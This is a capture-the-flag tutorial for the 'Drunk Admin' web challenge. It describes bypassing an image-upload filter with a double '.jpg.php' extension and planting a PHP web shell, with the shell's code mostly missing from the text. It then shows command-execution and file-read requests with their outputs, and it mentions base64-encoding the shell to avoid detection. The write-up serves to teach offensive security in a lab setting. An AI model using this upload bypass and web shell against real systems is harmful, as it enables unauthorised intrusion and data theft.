/* ** "Drunk Admin" Web hacking challenge tutorial ** http://x.x.x.x:8880 ** ** Kyriakos Ispoglou - Undergraduate Student ** ** Computer Enginnering & Informatics Department ** University of Patras, Greece */ We start by enumerating the application (using burpsuite). We find the files: index.php image.php upload.php info.php myphp.php?id=102 The last file shows the PHP credits. We know that phpinfo() function used for showing credits (and other information of course). Thus id may be the parameter '$what' of phpinfo(), so we try to modify the id parameter. If we change id to 99, we get a lot of information about PHP credits and configuration. Then we try to understand the application's logic.We upload an image with name pic.png. upload.php is called (which uploads the image) and then image.php shows our picture. If we view the page source code, we will see: ... ... ... ... Our image, is renamed before it is stored on the server at /images directory. Image's name looks like MD5 because it is 32-bytes long and contains only numbers and a-f characters. After uploading some images, we end up: name.xxx renames to: md5( 'name.xxx' ) . '.xxx' (where xxx is a valid image extension) We can bypass application's validation by uploading a php file with name: image.jpg.php. Then the file will be renamed to: md5( 'image.jpg.php' ) . '.php', at /images directory. Thus we can upload a php file and we can execute our code to server, by calling our file from the URL: http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php We write the following php code, in order to execute shell commands to server: "; } } ?> With this code we can execute basic unix shell commands. 'command' argument contains the shell command to be executed on server. In order to view the contents of a file which may contain html special characters, as plaintext in browser we use htmlspecialchars() function and 'file' argument. To prevent detection of the code above, we encode the source to base64: We start by writing: http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=whoami To see who user I am: www-data. http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=pwd To get the current directory: /var/www/images http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la Shows the contents of /images directory. http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la .. Shows the contents of /var/www directory total 48 drwxr-xr-x 4 root root 4096 Mar 26 22:56 . drwxr-xr-x 14 root root 4096 Mar 3 00:06 .. -rw-r--r-- 1 root root 217 Mar 3 13:50 .htaccess -rw-r--r-- 1 root root 322 Mar 6 17:02 .proof -rw-r--r-- 1 root root 2683 Mar 7 06:41 image.php drwxrwxr-x 2 root www-data 4096 Mar 28 19:00 images -rw-r--r-- 1 root root 2141 Mar 26 22:54 index.php -rw-r--r-- 1 root root 1943 Mar 4 06:28 info.php -rw-r--r-- 1 root root 279 Mar 4 06:26 myphp.php drwxr-xr-x 2 root root 4096 Mar 3 03:18 style -rw-r--r-- 1 root root 2144 Mar 7 06:39 upload.php -rw-r--r-- 1 root root 51 Mar 3 09:08 xmm.html We are searching for a hidden file. What's the .proof file? Let's see: http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?file=../.proof ######################### # Drunk Admin Challenge # # by @anestisb # ######################### bob> Great work. bob> Meet me there. ...> ? bob> What? You don't know where? bob> Work a little more your post exploitation skills. Secret Code: TGglMUxecjJDSDclN1Ej Mail me your methods at: anestis@bechtsoudis.com [END OF .proof FILE] We get a Secret Code: TGglMUxecjJDSDclN1Ej. This may be base64 encoded. We decode the Secret Code and we get: Lh%1L^r2CH7%7Q# Whose bob? Is bob a user? http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home total 12 drwxr-xr-x 3 root root 4096 Mar 3 00:02 . drwxr-xr-x 21 root root 4096 Mar 2 23:56 .. drwxr-xr-x 4 bob bob 4096 Mar 6 16:17 bob Yes. Bob is a user on the server. http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home/bob total 28 drwxr-xr-x 4 bob bob 4096 Mar 6 16:17 . drwxr-xr-x 3 root root 4096 Mar 3 00:02 .. -rw-r--r-- 1 bob bob 220 Mar 3 00:02 .bash_logout -rw-r--r-- 1 bob bob 3184 Mar 3 00:02 .bashrc -rw-r--r-- 1 bob bob 675 Mar 3 00:02 .profile drwxr-xr-x 2 root root 4096 Mar 6 16:16 Documents drwxr-xr-x 3 bob bob 4096 Mar 6 17:01 public_html http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home/bob/public_html total 20 drwxr-xr-x 3 bob bob 4096 Mar 6 17:01 . drwxr-xr-x 4 bob bob 4096 Mar 6 16:17 .. -rw-r--r-- 1 bob bob 1730 Mar 6 16:49 encrypt.php drwxr-xr-x 2 bob bob 4096 Mar 6 16:55 include -rw-r--r-- 1 bob bob 791 Mar 6 17:01 index.php We can access the index.php from browser: http://x.x.x.x:8880/~bob/ Finally we write the decoded Secret Code in the form, and we have: Alice, prepare for a kinky night. Meet me at '35.517286' '24.017637' If we write these number in google maps, we get the secret location: Coast Tombazis 7, Chania Crete, Greece. That's it!